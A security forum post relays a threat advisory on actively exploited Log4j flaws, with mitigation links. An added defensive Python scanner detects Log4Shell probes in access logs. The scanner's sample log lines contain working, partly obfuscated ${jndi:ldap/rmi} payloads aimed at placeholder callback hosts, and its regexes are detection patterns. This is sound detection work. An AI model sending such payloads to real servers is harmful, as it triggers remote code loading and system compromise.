Cyber Forum
Log4j Vulnerability Information
<blockquote data-quote="MJ Shoer" data-source="post: 2503" data-attributes="member: 3"><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(0, 168, 133)">TLP: Green</span> Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges</h3><p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Critical CVE</strong></li> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Nation State Attack</strong></li> </ol><p><strong>Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges</strong></p><p><strong>Summary:</strong></p><p>Microsoft and Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit the Log4j vulnerabilities: "MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications. In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their specific targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with the testing activity to fingerprint systems" (<a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft, 2021</a>).</p><p><strong>Analyst Comments:</strong></p><p>It was disclosed that a second vulnerability could result in a DoS attack on systems/software where the logging tool may be used. IT teams scrambled to apply version 2.15 across as many vulnerable devices as possible, only to find out the patch was incomplete. Apache released version 2.16; it was thought that the only additional vulnerability would result in a denial-of-service attack, essentially causing a targeted system to become unresponsive. However, researchers warn of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has already been addressed in version 2.16.0.</p><p><strong>Mitigation:</strong></p><p>We have shared various tools, indicators of compromise, and APTs we have come across due to this recently disclosed bug. CISA has a website that contains a plethora of resources companies can use to assess risk and apply mitigation measures as necessary. Additional vulnerabilities will likely be disclosed in due time; companies should continue to monitor inbound and outbound traffic from resources that may utilize Log4j.</p><p><em><strong>Apache Log4j Vulnerability Guidance</strong></em></p><ul> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></li> </ul><p><em><strong>Mitigation Guidance from JCDC Partners</strong></em></p><ul> <li data-xf-list-type="ul"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day" target="_blank">Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content</a></li> <li data-xf-list-type="ul"><a href="https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" target="_blank">Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild</a></li> <li data-xf-list-type="ul"><a href="https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/" target="_blank">Cloudflare Blog: CVE-2021-44228 - Log4j RCE 0-day mitigation</a></li> <li data-xf-list-type="ul"><a href="https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/" target="_blank">CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/" target="_blank">IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html" target="_blank">Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research</a></li> <li data-xf-list-type="ul"><a href="https://www.mandiant.com/resources/log4shell-recommendations" target="_blank">Mandiant blog: Log4Shell Initial Exploitation and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation</a></li> <li data-xf-list-type="ul"><a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" target="_blank">Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations</a></li> <li data-xf-list-type="ul"><a href="https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html" target="_blank">Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued</a></li> <li data-xf-list-type="ul"><a href="https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com" target="_blank">Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html" target="_blank">VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know</a></li> </ul><p><strong>Source:</strong></p><p><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></p><p><a href="https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html" target="_blank">https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html</a></p><p><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">https://www.microsoft.com/security/...ting-for-cve-2021-44228-log4j-2-exploitation/</a></p></blockquote>
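<p>The mitigation section of the post above tells teams to keep monitoring traffic to and from anything that uses Log4j. The following Python is an added example, not code from MJ Shoer's post or from any of the linked vendor advisories: it scans web access log lines for CVE-2021-44228 (Log4Shell) probe strings and, before matching, undoes the obfuscations attackers used to slip past naive <code>${jndi:</code> filters (URL encoding, <code>${lower:j}</code>/<code>${upper:N}</code> case wrappers, and <code>${::-j}</code> / <code>${env:X:-j}</code> default-value tricks). The log lines and IP addresses are constructed for the example, and the function names are my own.</p>

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup obfuscations commonly seen in Log4Shell probes.
# ${lower:j} / ${upper:N}  -> the wrapped character
# ${::-j} / ${env:NOPE:-j} -> the default value after ":-"
# Both patterns only match innermost lookups (no $ { } inside),
# so repeated substitution peels nested layers from the inside out.
_CASE_WRAP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VAL = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# After normalisation a probe looks like ${jndi:ldap://host:port/path}.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps|ldap|rmi|dns|iiop|corba|nds|http)\s*:/*([^/${}\s]+)",
    re.IGNORECASE,
)
_JNDI_LOOSE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Percent-decode (a few layers) and collapse lookup obfuscations."""
    s = text
    for _ in range(3):  # handle double/triple URL encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        new = _CASE_WRAP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_VAL.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi(text: str):
    """Return details of a JNDI lookup in `text`, or None if there is none."""
    norm = normalize_lookups(text)
    m = _JNDI.search(norm)
    if m:
        return {"scheme": m.group(1).lower(), "target": m.group(2), "normalized": norm}
    if _JNDI_LOOSE.search(norm):  # jndi present but in a form we did not parse
        return {"scheme": None, "target": None, "normalized": norm}
    return None


def scan_access_log(lines):
    """Scan log lines; return one hit per line containing a JNDI probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hit["line"] = n
            hits.append(hit)
    return hits


# Constructed sample lines (Apache combined format, documentation IP ranges).
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [14/Dec/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Dec/2021:10:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.41 - - [14/Dec/2021:10:02:19 +0000] "GET /?x=${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.11:1389/o} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.58 - - [14/Dec/2021:10:02:25 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F203.0.113.12%3A1099%2Fx%7D"',
    '198.51.100.9 - - [14/Dec/2021:10:02:30 +0000] "GET /search?q=${user} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['target']}")
```

<p>The <code>target</code> field is the callback host the exploit would contact (LDAP/RMI server); feeding those hosts into an egress block list and alerting on outbound connections to them from application servers is the outbound half of the monitoring the post recommends. The loose fallback match is deliberate: a line with <code>${jndi:</code> in an unparsed form is still worth an alert rather than a silent miss.</p>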